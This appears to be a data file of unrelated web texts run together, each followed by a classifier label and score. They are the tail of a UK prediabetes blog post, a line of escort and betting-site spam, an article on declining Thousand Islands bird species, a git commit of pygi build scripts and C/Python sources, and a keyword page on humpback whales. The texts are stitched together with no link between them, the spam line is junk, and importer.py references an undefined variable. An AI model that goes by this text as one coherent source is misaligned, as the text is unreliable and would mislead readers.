aim to complete at least 150 minutes of moderate aerobic activity per week. So, you could perform 30 minutes every day for five days and rest for two, it is important you have rest days to let your body recover. Aerobic activities include: • Cycling • Brisk walking • Swimming • Gardening You should combine this with strength exercise on 2 or more days per week, too. Strength exercises should work your major muscles and you may choose weights or your own body weight using exercises like press ups, pull ups or sit ups. As you progress you may prefer to incorporate some vigorous aerobic exercise into your programme, 75 minutes per week is advisable instead of 150 minutes of aerobic activity. But this should also be combined with strength training. Vigorous intensity aerobic activities include: • Running • Swimming laps • Playing singles tennis • Hiking Additional benefits of exercise are: • Increases good cholesterol and reduces bad cholesterol • Better mental health • Lower blood pressure • Better weight control • Strong Bones • Better sleep • Increased energy levels • Stronger muscles If you have type 2 diabetes or you think you may be at risk, you should speak to your doctor before starting any new exercise. Making changes to your diet and increasing your physical activity levels can help to reduce the risk of developing type 2 diabetes, reverse prediabetes and even put type 2 diabetes into remission. Summary An HbA1c blood test is the best way to check for type 2 diabetes. If blood glucose levels are high to indicate prediabetes then lifestyle changes can be made to prevent it developing into type 2 diabetes. In the UK, up to 10% of people diagnosed as prediabetic go on to develop diabetes.  Type 2 diabetes can be reversed through diet and exercise, as well as surgery.  Making simple yet effective changes to your lifestyle can dramatically reduce the chance of developing the type 2 diabetes and can even reverse prediabetes. The two biggest factors are diet and exercise. 
Return to Blog>> HbA1c (pre-diabetes) Our HbA1c blood test measures average blood glucose levels over a 10-12 week period. Gain accurate data on the amount of sugar in your diet and reduce your risk of type 2 diabetes. HbA1c (pre-diabetes) £39 1 Biomarkers Included Check your body's average average blood glucose level. References 1. Diabetes Digital Media Ltd. (2019). Prediabetes (Borderline Diabetes). Available at: https://www.diabetes.co.uk/pre-diabetes.html 2. National Health Service. (2014). One in Three Adults in England ‘Has Prediabetes’. Available at: https://www.nhs.uk/news/diabetes/one-in-three-adults-in-england-has-prediabetes/ 3. Rynders, C, A et al. (2014). Effects of Exercise Intensity on Postprandial Improvement in Glucose Disposal and Insulin Sensitivity in Prediabetic Adults. The Journal of Clinical Endocrinology and Metabolism: 99(1), pp 220-228. 4. Tuso, P. (2014). Prediabetes and Lifestyle Modification: Time to Prevent a Preventable Disease. Perm J: 18(3), pp 88-93. 5. https://www.diabetes.org.uk/type-2-diabetes SHARE THIS ARTICLE​ Share on facebook Share on twitter Share on linkedin Service Status Kit Dispatch Kits ordered before 2pm from Monday to Friday continue to be dispatched same day via First Class Royal Mail. After 2pm your kit will be dispatched the next working day. Orders placed on the weekend will be despatched Monday. Postal Service There may be some delays in parts of the UK while the Royal Mail catches up with their Christmas backlog. Click here for updates on the Royal Mail service. Lab Analysis Our labs are operating as normal. Doctor/nurse reviews Our doctors and nurses are currently working remotely and continue to review results. Home phlebotomy appointments Our home phlebotomy service is running but please be aware, if you or anyone in your household have experienced symptoms of COVID-19 within the last 14 days, due to the current government guidelines, we are unable to arrange an appointment at this time. Due to a high demand for nurses, along with current covid restrictions around the UK, there may be a delay in providing an appointment. Customer service Our customer service team are currently working from home, available to answer any questions via email. Results dashboard You can continue to access your results as normal either through your browser or via our iOS or Android app. CORPORATE ENQUIRY If you are an employer and would like to order multiple tests for your employees, please complete the form below.
__label__pos
0.872791
ankara escort kusadasi escort giresun escort kirklareli escort bahis siteleri antalya escort antalya escort Photo © Ian Coristine/1000IslandsPhotoArt.com  You are here:  Back Issues      Archive Search    River Birds: The Bad, Part III So far my articles have concentrated on the winners with increasing populations over the last four decades. Now I will mention the losers. Even though birds are better understood and monitored than most other living organisms, our knowledge of many species remains crude and imprecise. Only when species are rapidly increasing or severely declining can we detect significant population fluctuations. For species in decline such understanding may come too late to stop local or regional extinctions of a permanent or temporary nature. For the following birds a clear decline has occurred in our region during the last forty years.Female Zonnenberg Black Tern. This diminutive "marsh tern" was well distributed here and there along the River as a breeder in the late 1970s. Since then it has virtually disappeared from the area remaining only at two sites near the River. This local pattern mirrors a regional decline in the northeastern quarter of the continent. Our remaining largest population is at Perch River Wildlife Management area with its controlled water levels. It is likely the hydrological disruption of previous water level management on the River has contributed to this species decline. Hopefully, the adoption of Plan 2014 will gradually make our marshes more hospitable to this lovely bird.Male bobolink zonnenberg The Loggerhead Shrike was once a fairly common bird in Northern New York. This species was already in decline, by the 1970s and was virtually extinct in New York, by a decade later. We haven't a clue why, as its habitat seems intact. This decline has occurred throughout most of the northern parts of these species range, where they are migrants. The late Dr. F. G. Scheider of Syracuse, suggested our birds were vulnerable to chemical control of fire ants, on their winter range. This seems as good an explanation as any. The province of Ontario has begun a restoration effort for this species, by releasing captive reared birds. Perhaps some of these will expand to our area, or a similar effort that may be undertaken in New York, will help restore this interesting predatory songbird. Zenda bobolinks The group of birds that has declined the most in our region, during the last four decades, are those that utilize grasslands. Intensive agriculture is the primary culprit, by converting grass to row crops and by doing too frequent mowing of remaining grass areas. Thus, species breeding in these areas are being hammered at a level, where reproductive success is often impossible. The populations of species, such as the Eastern Meadowlark, Bobolink and Savannah Sparrow, have been reduced. While these birds still remain fairly common locally, the trend is not a positive one. Other species, including Northern Harrier, take months to get their young to fledging. The constant mowing has rendered, once suitable nesting areas, unusable. The Upland Sandpiper (formerly called Upland Plover) and Henslow's Sparrow, once fairly Common in our region, are virtually gone. The North Country Bird Club has existed for seven decades and their newsletter is called the Upland Plover. This indicates how common this species once was, as bird club newsletter mascots are usually locally common birds of interest. 
The current editor of that publication tells me he has never seen the species in the field in NNY. Heron zonnenberg Grassland birds, in general now, require human conservation action, such as that being conducted by the Thousand Islands Land Trust. This avian guild is one of the fastest declining bird groups in many parts of the world. Grassland birds are in severe trouble, for many reasons, possibly including climate change. They will require concerted conservation management efforts, such as those that improved Bald Eagle and Common Tern populations in our region. Their future locally depends on us. One of the poster children for bird decline in North America, is the Golden-winged Warbler. A candidate for the federal endangered species, this species was not common in our region, four decades ago. The gradual shifting north of this beautiful bird is a result of competitive pressure, from the closely related and genetically dominant, Blue-winged Warbler. These two species were once geographically isolated, but have been brought together by landscape level changes,due to human activity. Scientists are scrambling madly, to understand breeding habitat factors that may isolate these two species. One of the two largest Golden-winged Warbler populations, in the Northeast US, now exists in the nearby Indian River Lakes Region. Management efforts are underway, to understand how best to protect and manage this species in our region. Hopefully success will occur, as there is a limit to how far north this species can retreat, before it runs out of suitable habitat. IN flight Zonnenberg Several other birds that were more common on the River, forty years ago, are experiencing local and regional declines, from known and unknown factors. Great Blue Heron sightings, in the Thousand Islands region, have decreased in this century. This is in large part due to the abandonment of the massive Ironsides Island colony. Cyclic colony development and abandonment is normal for this species, due to nest tree die-off and other factors. Many of the herons from this colony seemed to have formed smaller associations in other areas. It's unclear if this apparent decline is real, or simply an artifact of smaller more dispersed colonies. This species seems to be doing well in most parts of New York State. For human residents with bird feeders, the decline of one species of winter visitor is striking. The Evening Grosbeak used to descend in hordes on any available sunflower seed, prior to the mid-1990s. This species was an incredibly common winter visitor, for the first three decades of my birding career. Then suddenly, over just a few short years, the hordes came no more. By this century, the sighting of pairs and small groups became an event. Why? Well it appears that over the last few years, science has given us an answer to the enigma. While they are with us, these big bold finches are vegetarians, inhaling sunflower seeds, like vacuum cleaners. Fishing Bue t turns out that while on their Canadian Forest breeding grounds, a primary food source is the spruce budworm, whose tiny caterpillars infest black spruce. When infestations develop,populations surge along, with those of several Warbler species, including Cape May and Bay-breasted. It seems that there have been fewer cyclic outbreaks of the budworm, in the last two decades and those that have occurred have often been suppressed, by commercial forestry interests. 
This species population seems to be exhibiting evidence of a slight rebound, but whether the hordes that graced my youth will return in my lifetime is unknown. Bird and wildlife populations are dynamic and fluctuations with change are normal. Unfortunately, given the intense pressure humans are placing on our planet, wildlife is being forced to adapt much faster than evolution usually requires. For those that do, they shall remain our fellow travelers in life for a long time. As the dominant species on this planet, we must assure that the losers, in the brave new world of the Anthropocene, are part of the future of the Thousand Islands. By Gerry Smith Gerald A. "Gerry" Smith, is an ornithologist who can often be found leading fellow bird enthusiasts, on guided Thousand Islands Trust (TILT) tours, throughout the year.  He is a graduate of the biology program at SUNY Oswego, is one of the founding members of Derby Hill Bird Observatory, along Lake Ontario. He was the first staff ornithologist at Derby Hill, for the Onondaga Audubon Society. Gerry was President of the Onondaga Audubon Society and in 2010, he published the popular guide book, "Birding the Great Lakes Seaway Trail.” Posted in: Nature Please feel free to leave comments about this article using the form below. Comments are moderated and we do not accept comments that contain links. As per our privacy policy, your email address will not be shared and is inaccessible even to us. For general comments, please email the editor. Comments Peter Glazier Comment by: Peter Glazier Left at: 7:55 PM Wednesday, March 15, 2017 I am surprised in these columns that there was no mention of the elephant in th room, so to speak, of the cormorant. This bird in the last 10 years has probably done more harm to the environment of the Thousand Isalnds, above and below the water, than any other species! Still waiting for the Ontario government to recognize the damage. Post Comment Name (required) Email (required)
__label__pos
0.656201
Commit b24fd963 authored by Simon van der Linden's avatar Simon van der Linden Browse files Initial import parents .libs/ .deps/ /COPYING Makefile Makefile.in /aclocal.m4 /autom4te.cache/ /config.guess /config.h /config.h.in /config.log /config.status /config.sub /configure /depcomp /install-sh /libtool /ltmain.sh /m4/ /missing /py-compile /pygi-*.tar.gz /stamp-h1 *.o *.lo *.la *.so *.pyc *.gir *.typelib .*.swp ACLOCAL_AMFLAGS = -I m4 AM_CFLAGS = \ -Wall \ -g SUBDIRS = \ gi \ tests #!/bin/sh # Run this to generate all the initial makefiles, etc. srcdir=`dirname $0` test -z "$srcdir" && srcdir=. DIE=0 if [ -n "$GNOME2_DIR" ]; then ACLOCAL_FLAGS="-I $GNOME2_DIR/share/aclocal $ACLOCAL_FLAGS" LD_LIBRARY_PATH="$GNOME2_DIR/lib:$LD_LIBRARY_PATH" PATH="$GNOME2_DIR/bin:$PATH" export PATH export LD_LIBRARY_PATH fi (test -f $srcdir/configure.ac) || { echo -n "**Error**: Directory "\`$srcdir\'" does not look like the" echo " top-level package directory" exit 1 } (autoconf --version) < /dev/null > /dev/null 2>&1 || { echo echo "**Error**: You must have \`autoconf' installed." echo "Download the appropriate package for your distribution," echo "or get the source tarball at ftp://ftp.gnu.org/pub/gnu/" DIE=1 } (grep "^IT_PROG_INTLTOOL" $srcdir/configure.ac >/dev/null) && { (intltoolize --version) < /dev/null > /dev/null 2>&1 || { echo echo "**Error**: You must have \`intltool' installed." echo "You can get it from:" echo " ftp://ftp.gnome.org/pub/GNOME/" DIE=1 } } (grep "^AM_PROG_XML_I18N_TOOLS" $srcdir/configure.ac >/dev/null) && { (xml-i18n-toolize --version) < /dev/null > /dev/null 2>&1 || { echo echo "**Error**: You must have \`xml-i18n-toolize' installed." echo "You can get it from:" echo " ftp://ftp.gnome.org/pub/GNOME/" DIE=1 } } (grep "^AM_PROG_LIBTOOL" $srcdir/configure.ac >/dev/null) && { (libtool --version) < /dev/null > /dev/null 2>&1 || { echo echo "**Error**: You must have \`libtool' installed." echo "You can get it from: ftp://ftp.gnu.org/pub/gnu/" DIE=1 } } (grep "^AM_GLIB_GNU_GETTEXT" $srcdir/configure.ac >/dev/null) && { (grep "sed.*POTFILES" $srcdir/configure.ac) > /dev/null || \ (glib-gettextize --version) < /dev/null > /dev/null 2>&1 || { echo echo "**Error**: You must have \`glib' installed." echo "You can get it from: ftp://ftp.gtk.org/pub/gtk" DIE=1 } } (automake --version) < /dev/null > /dev/null 2>&1 || { echo echo "**Error**: You must have \`automake' installed." echo "You can get it from: ftp://ftp.gnu.org/pub/gnu/" DIE=1 NO_AUTOMAKE=yes } # if no automake, don't bother testing for aclocal test -n "$NO_AUTOMAKE" || (aclocal --version) < /dev/null > /dev/null 2>&1 || { echo echo "**Error**: Missing \`aclocal'. The version of \`automake'" echo "installed doesn't appear recent enough." echo "You can get automake from ftp://ftp.gnu.org/pub/gnu/" DIE=1 } if test "$DIE" -eq 1; then exit 1 fi if test -z "$*"; then echo "**Warning**: I am going to run \`configure' with no arguments." echo "If you wish to pass any to it, please specify them on the" echo \`$0\'" command line." echo fi case $CC in xlc ) am_opt=--include-deps;; esac for coin in `find $srcdir -path $srcdir/CVS -prune -o -name configure.ac -print` do dr=`dirname $coin` if test -f $dr/NO-AUTO-GEN; then echo skipping $dr -- flagged as no auto-gen else echo processing $dr ( cd $dr aclocalinclude="$ACLOCAL_FLAGS" if grep "^AM_GLIB_GNU_GETTEXT" configure.ac >/dev/null; then echo "Creating $dr/aclocal.m4 ..." test -r $dr/aclocal.m4 || touch $dr/aclocal.m4 echo "Running glib-gettextize... Ignore non-fatal messages." 
echo "no" | glib-gettextize --force --copy echo "Making $dr/aclocal.m4 writable ..." test -r $dr/aclocal.m4 && chmod u+w $dr/aclocal.m4 fi if grep "^IT_PROG_INTLTOOL" configure.ac >/dev/null; then echo "Running intltoolize..." intltoolize --copy --force --automake fi if grep "^AM_PROG_XML_I18N_TOOLS" configure.ac >/dev/null; then echo "Running xml-i18n-toolize..." xml-i18n-toolize --copy --force --automake fi if grep "^AM_PROG_LIBTOOL" configure.ac >/dev/null; then if test -z "$NO_LIBTOOLIZE" ; then echo "Running libtoolize..." libtoolize --force --copy fi fi echo "Running aclocal $aclocalinclude ..." aclocal $aclocalinclude if grep "^A[CM]_CONFIG_HEADER" configure.ac >/dev/null; then echo "Running autoheader..." autoheader fi echo "Running automake --foreign $am_opt ..." automake --add-missing --foreign $am_opt echo "Running autoconf ..." autoconf ) fi done conf_flags="--enable-maintainer-mode" if test x$NOCONFIGURE = x; then echo Running $srcdir/configure $conf_flags "$@" ... $srcdir/configure $conf_flags "$@" \ && echo Now type \`make\' to compile. || exit 1 else echo Skipping configure process. fi AC_INIT(pygi, 0.1) AM_INIT_AUTOMAKE(foreign) AC_CONFIG_HEADERS(config.h) AC_CONFIG_MACRO_DIR(m4) m4_ifdef([AM_SILENT_RULES], [AM_SILENT_RULES]) AM_MAINTAINER_MODE AC_ISC_POSIX AC_PROG_CC AM_PROG_CC_STDC AC_HEADER_STDC AM_PROG_LIBTOOL # Python AM_PATH_PYTHON(2.5.2) AC_PATH_TOOL(PYTHON_CONFIG, "/python${PYTHON_VERSION}-config") if test -z "$PYTHON_CONFIG"; then AC_MSG_ERROR(Python development tools not found) fi PYTHON_INCLUDES=`$PYTHON_CONFIG --includes` AC_SUBST(PYTHON_INCLUDES) save_CPPFLAGS="${CPPFLAGS}" CPPFLAGS+="${PYTHON_INCLUDES}" AC_CHECK_HEADER(Python.h, , AC_MSG_ERROR(Python headers not found)) CPPFLAGS="${save_CPPFLAGS}" # GNOME PKG_CHECK_MODULES(GNOME, glib-2.0 >= 2.22 gobject-introspection-1.0 >= 0.6.4 pygobject-2.0 >= 2.20 ) INTROSPECTION_SCANNER=`$PKG_CONFIG --variable=g_ir_scanner gobject-introspection-1.0` INTROSPECTION_COMPILER=`$PKG_CONFIG --variable=g_ir_compiler gobject-introspection-1.0` AC_SUBST(INTROSPECTION_SCANNER) AC_SUBST(INTROSPECTION_COMPILER) AC_OUTPUT( Makefile gi/Makefile gi/repository/Makefile gi/overrides/Makefile tests/Makefile ) PLATFORM_VERSION = 2.0 pkgincludedir = $(includedir)/pygtk-$(PLATFORM_VERSION) pkgpyexecdir = $(pyexecdir)/gtk-2.0 SUBDIRS = \ repository \ overrides pygidir = $(pkgpyexecdir)/gi pygi_PYTHON = \ types.py \ module.py \ importer.py \ __init__.py _gi_la_CFLAGS = \ $(PYTHON_INCLUDES) \ $(GNOME_CFLAGS) _gi_la_LDFLAGS = \ -module \ -avoid-version \ -export-symbols-regex init_gi _gi_la_LIBADD = \ $(GNOME_LIBS) _gi_la_SOURCES = \ pygi-repository.c \ pygi-repository.h \ pygi-info.c \ pygi-info.h \ pygi-struct.c \ pygi-struct.h \ pygi-argument.c \ pygi-argument.h \ pygi-type.c \ pygi-type.h \ pygi.h \ pygi-private.h \ pygobject-external.h \ gimodule.c pygi_LTLIBRARIES = _gi.la .la.so: $(LN_S) .libs/$@ $@ || true all: $(pygi_LTLIBRARIES:.la=.so) clean-local: rm -f $(pygi_LTLIBRARIES:.la=.so) # -*- Mode: Python; py-indent-offset: 4 -*- # vim: tabstop=4 shiftwidth=4 expandtab # # Copyright (C) 2005-2009 Johan Dahlin <[email protected]> # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. 
# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 # USA from __future__ import absolute_import from ._gi import _API /* -*- Mode: C; c-basic-offset: 4 -*- * vim: tabstop=4 shiftwidth=4 expandtab * * Copyright (C) 2005-2009 Johan Dahlin <[email protected]> * * gimodule.c: wrapper for the gobject-introspection library. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 * USA */ #include "pygi-private.h" #include <pygobject.h> static PyObject * _wrap_pyg_enum_add (PyObject *self, PyObject *args, PyObject *kwargs) { static char *kwlist[] = { "g_type", NULL }; PyObject *py_g_type; GType g_type; if (!PyArg_ParseTupleAndKeywords(args, kwargs, "O!:enum_add", kwlist, &PyGTypeWrapper_Type, &py_g_type)) { return NULL; } g_type = pyg_type_from_object(py_g_type); if (g_type == G_TYPE_INVALID) { return NULL; } return pyg_enum_add(NULL, g_type_name(g_type), NULL, g_type); } static PyObject * _wrap_pyg_flags_add (PyObject *self, PyObject *args, PyObject *kwargs) { static char *kwlist[] = { "g_type", NULL }; PyObject *py_g_type; GType g_type; if (!PyArg_ParseTupleAndKeywords(args, kwargs, "O!:flags_add", kwlist, &PyGTypeWrapper_Type, &py_g_type)) { return NULL; } g_type = pyg_type_from_object(py_g_type); if (g_type == G_TYPE_INVALID) { return NULL; } return pyg_flags_add(NULL, g_type_name(g_type), NULL, g_type); } static PyObject * _wrap_pyg_set_object_has_new_constructor (PyObject *self, PyObject *args, PyObject *kwargs) { static char *kwlist[] = { "g_type", NULL }; PyObject *py_g_type; GType g_type; if (!PyArg_ParseTupleAndKeywords(args, kwargs, "O!:set_object_has_new_constructor", kwlist, &PyGTypeWrapper_Type, &py_g_type)) { return NULL; } g_type = pyg_type_from_object(py_g_type); if (!g_type_is_a(g_type, G_TYPE_OBJECT)) { PyErr_SetString(PyExc_TypeError, "must be a subtype of GObject"); return NULL; } pyg_set_object_has_new_constructor(g_type); Py_RETURN_NONE; } static PyMethodDef _pygi_functions[] = { { "enum_add", (PyCFunction)_wrap_pyg_enum_add, METH_VARARGS | METH_KEYWORDS }, { "flags_add", (PyCFunction)_wrap_pyg_flags_add, METH_VARARGS | METH_KEYWORDS }, { "set_object_has_new_constructor", (PyCFunction)_wrap_pyg_set_object_has_new_constructor, METH_VARARGS | METH_KEYWORDS }, { NULL, NULL, 0 } }; struct PyGI_API PyGI_API = { pygi_type_import_by_g_type }; PyMODINIT_FUNC init_gi(void) { PyObject *m; PyObject *api; m = Py_InitModule("_gi", _pygi_functions); if (m == NULL) { return; } if (pygobject_init(-1, -1, -1) == NULL) { return; } if 
(_pygobject_import() < 0) { return; } _pygi_repository_register_types(m); _pygi_info_register_types(m); _pygi_struct_register_types(m); _pygi_argument_init(); api = PyCObject_FromVoidPtr((void *)&PyGI_API, NULL); if (api == NULL) { return; } PyModule_AddObject(m, "_API", api); } # -*- Mode: Python; py-indent-offset: 4 -*- # vim: tabstop=4 shiftwidth=4 expandtab # # Copyright (C) 2005-2009 Johan Dahlin <[email protected]> # # importer.py: dynamic importer for introspected libraries. # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 # USA from __future__ import absolute_import import sys import gobject from ._gi import Repository, RepositoryError from .module import DynamicModule repository = Repository.get_default() class DynamicImporter(object): # Note: see PEP302 for the Importer Protocol implemented below. def __init__(self, path): self.path = path def find_module(self, fullname, path=None): if not fullname.startswith(self.path): return path, namespace = fullname.rsplit('.', 1) if path != self.path: return try: repository.require(namespace) except RepositoryError: pass else: return self def load_module(self, fullname): if fullname in sys.modules: return sys.modules[name] path, namespace = fullname.rsplit('.', 1) # Workaround for GObject if namespace == 'GObject': sys.modules[fullname] = gobject return gobject # Look for an overrides module overrides_name = 'gi.overrides.%s' % namespace try: overrides_type_name = '%sModule' % namespace overrides_module = __import__(overrides_name, fromlist=[overrides_type_name]) module_type = getattr(overrides_module, overrides_type_name) except ImportError, e: module_type = DynamicModule module = module_type.__new__(module_type) module.__dict__ = { '__file__': '<%s>' % fullname, '__name__': fullname, '__namespace__': namespace, '__loader__': self } sys.modules[fullname] = module module.__init__() return module # -*- Mode: Python; py-indent-offset: 4 -*- # vim: tabstop=4 shiftwidth=4 expandtab # # Copyright (C) 2007-2009 Johan Dahlin <[email protected]> # # module.py: dynamic module for introspected libraries. # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. 
# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 # USA from __future__ import absolute_import import os import gobject from ._gi import \ Repository, \ FunctionInfo, \ RegisteredTypeInfo, \ EnumInfo, \ ObjectInfo, \ InterfaceInfo, \ ConstantInfo, \ StructInfo, \ Struct, \ enum_add, \ flags_add from .types import \ GObjectMeta, \ StructMeta, \ Boxed, \ Function repository = Repository.get_default() def get_parent_for_object(object_info): parent_object_info = object_info.get_parent() if not parent_object_info: return object namespace = parent_object_info.get_namespace() name = parent_object_info.get_name() # Workaround for GObject.Object and GObject.InitiallyUnowned. if namespace == 'GObject' and name == 'Object' or name == 'InitiallyUnowned': return gobject.GObject
__label__pos
0.936129
KeyWEn.com         Humpbacks       Article     History   Tree Map   Encyclopedia of Keywords > Life > Animals > Specific Animals > Whales > Humpbacks   Michael Charnine Keywords and Sections RORQUALS HUMPBACKS TRAVEL HUMPBACKS LIVE ADULT HUMPBACKS FEMALE HUMPBACKS SEALS BREEDING BAN NORTHERN HEMISPHERE CATCH SOUTHEAST ALASKA ALASKA FISHES SHARKS SOUTH PACIFIC CARIBBEAN WEST INDIES SCIENTISTS HUMPBACKS FEED PLANKTON SONG SONGS WHITE-SIDED DOLPHINS PODS BUBBLES MOUTHS HUNTING SUMMER MONTHS WINTER ENDANGERED ENDANGERED SPECIES GRAY WHALES KILLER WHALES DIVE SPERM WHALES RIGHT WHALES BLUE WHALE BLUE WHALES MIGRATING SUMMER LATE SPRING ESTIMATED WORLD POPULATION TROPICAL WATERS SOUTHERN JAPAN WHALE WATCHING TOURS Review of Short Phrases and Links     This Review contains major "Humpbacks"- related terms, short phrases and links grouped together in the form of Encyclopedia article. Definitions 1. Humpbacks are known as the acrobats of the ocean, often seen breaching (jumping out of the water), and flipper and tail slapping. (Web site) 2. Humpbacks are migratory, spending summers in cooler, high-latitude waters and mating and calving in tropical and subtropical waters. 3. Humpbacks are also described as rorquals, a family that includes the blue, fin, sei and minke whales. (Web site) 4. Humpbacks are mainly black or grey with white undersides to their flukes, flippers and bellies. (Web site) 5. Humpbacks are a type of baleen whale, the largest of all whales, a group including blue, fin and minke whales. Rorquals 1. Humpbacks are also rorquals, whales which have distinctive throat grooves. (Web site) 2. Like all rorquals, humpbacks are baleen whales. (Web site) Humpbacks Travel 1. Behaviour: Humpbacks travel in groups known as pods. Humpbacks Live 1. Complex habitat In the complex underwater habitats where humpbacks live, figuring out where other whales are, just by listening, can prove quite challenging. Adult Humpbacks 1. Adult humpbacks vary in length from 40-50 feet, the females being slightly longer than the males, and weigh up to 55 tons. (Web site) 2. It is estimated that adult humpbacks eat 1360 kg (2998 lb) of food each day. Female Humpbacks 1. Although both male and female Humpbacks are capable of song, the male is the main singer of the family. (Web site) Seals 1. This will be bad news for the humpbacks and minkes, as well as penguins, seals, and other predators that compete for these nourishing little morsels. (Web site) Breeding 1. But listen up, it's while breeding that male humpbacks "sing" their eerie wail. (Web site) Ban 1. The former Soviet Union also hunted humpbacks until 1973 in defiance of the ban, though it is disputed how many they killed. (Web site) 2. By 1968, when a ban was finally placed on hunting them, only about 1,000 humpbacks remained. Northern Hemisphere 1. Humpbacks from the Southern Hemisphere are larger on average than those in the Northern Hemisphere. Catch 1. A method known as bubble net feeding allows the humpbacks to catch a huge amount of tiny fish when feeding. (Web site) 2. Four species of rorquals as well as humpbacks are hunted; and during a portion of the season in 1903 the catch included 174 of the former and 14. Southeast Alaska 1. The humpbacks of southeast Alaska are known to migrate thousands of miles to Hawaii to mate, where they sing long and complex songs. Alaska 1. July through November, humpbacks may be spotted playing off central California, Alaska and the shores of Baja California. (Web site) Fishes 1. 
Because of this, humpbacks are classified as "swallowers" and not "skimmers." They do eat commercially exploited fishes. (Web site) Sharks 1. If the humpbacks are scared away from the shallow waters where they nurse their young, they are in danger from sharks. (Web site) South Pacific 1. The fleet is conducting its largest hunt in the South Pacific - it has instructions to kill up to 1,000 whales, including 50 humpbacks. (Web site) 2. While many of the humpbacks sing head down to Hawaii, it's the opposite in the South Pacific. (Web site) Caribbean 1. The humpbacks we see in our area spend the winter months in the Caribbean, an area that serves as their breeding and calving grounds. 2. Humpbacks arrive from the Caribbean in the early spring to feed on the south coast in the Hermitage and Placentia Bays. West Indies 1. Humpbacks have been extensively studied in their warm water breeding areas, particularly the West Indies, Bermuda, and Hawaii. (Web site) Scientists 1. But observations so far haven’t helped scientists understand whether humpbacks use songs the way birds do. 2. Washington, June 8 (ANI): Scientists have discovered that female humpbacks, especially of the same age, form bonds that last year after year. (Web site) Humpbacks Feed 1. Humpbacks feed heavily because, unlike most birds and mammals, they do not feed year round. 2. The rich waters attract many forms of fish and shrimp which the humpbacks feed on. 3. Humpbacks feed heavily in Glacier Bay because they do not feed year round. (Web site) Plankton 1. Humpbacks feed upon plankton, the plant and animal life at the surface of the ocean's water, or upon fish in large patches or schools. (Web site) Song 1. Cholewiak noticed two changes in song when humpbacks sang together. 2. Humpbacks often feed in large groups and are famous for their "song". (Web site) 3. It is the baleen whales, especially the humpbacks, which break into song. (Web site) Songs 1. Several variations of these songs are started at the beginning of the season, then eventually all humpbacks are singing the same song for that year. 2. We know, for instance, that while both male and female humpbacks can produce sounds, only males appear to sing songs with distinct themes and melodies. (Web site) 3. The "songs" of humpbacks are made up of complex vocal patterns. (Web site) White-Sided Dolphins 1. In June, the humpbacks begin to return; by late June they are abundant, and white-sided dolphins are often seen. (Web site) Pods 1. Humpbacks are very social whales, often traveling or hunting in pods of 200 or more individuals, though they are more spread out during their migrations. 2. Humpbacks can communicate with each other over great distances under water and travel in groups called pods. 3. Humpbacks swim in pods of three or four as they migrate. (Web site) Bubbles 1. The humpbacks manage to corral fish inside a cylindrical column of bubbles released through the whales' blowholes. (Web site) 2. Several humpbacks will join forces to compress a school of fish by blowing streams of bubbles around the school's periphery. (Web site) 3. This technique can involve a ring of bubbles up to 100 feet in diameter and the cooperation of a dozen Humpbacks. (Web site) Mouths 1. Unlike orca, which are odontocetes or toothed whales, humpbacks are mysticetes, harmless leviathans with only baleen plates in their mouths. 2. Humpbacks are baleen whales, which means that they have bristle like plates in their mouths to obtain nourishment. 3. 
Researchers don’t really know how the sounds are produced since Humpbacks don’t have vocal chords, and their mouths don’t move as they sing. Hunting 1. During the 1980's, the inhabitants of western Greenland were still hunting humpbacks, but they were limited to 10 whales per year. 2. In the late 1870s schooners began hunting humpbacks in the Gulf of Maine. (Web site) 3. Later, the Whaling Commission issued a ban on hunting humpbacks in 1966. (Web site) Summer Months 1. Humpbacks are seasonal feeders during the summer months in Antarctica, consuming as much as 2500 kg of krill, plankton or small fish daily. Winter 1. Anecdotal evidence from fishermen and other boaters, Straley said, indicated more humpbacks were using Prince William Sound in winter. (Web site) 2. During the winter most of the humpbacks migrate to the Caribbean where they mate and give birth to their young. (Web site) 3. The Hawaiian Islands are one of the world's most important whale habitats, hosting thousands of humpbacks (Megaptera novaeangliae) each winter. (Web site) Endangered 1. An international ban on commercial whaling was instituted in 1964, but humpbacks are still endangered. (Web site) Endangered Species 1. In spite of their recent strides towards recovery, humpbacks continue to be designated as an endangered species. Gray Whales 1. They communicate with each other by producing a great variety of sounds, from the moans and knocks of gray whales to the eerie songs of humpbacks. (Web site) Killer Whales 1. This is your opportunity to see Humpbacks, Orcas (Killer Whales), Minkes, Fins as well as the mighty Blue Whale, the largest animal to inhabit the earth. 2. The most common whales you are likely to see in Alaska are orcas, or killer whales and humpbacks. Dive 1. When bubble-net feeding, a pod of humpbacks dive to depths of 50 ft (15 m) and form a large circle. (Web site) 2. Humpbacks are also the whales who show off big fan tails when they dive. 3. Humpbacks can dive for up to 30 minutes and reach depths of 500-700 feet. 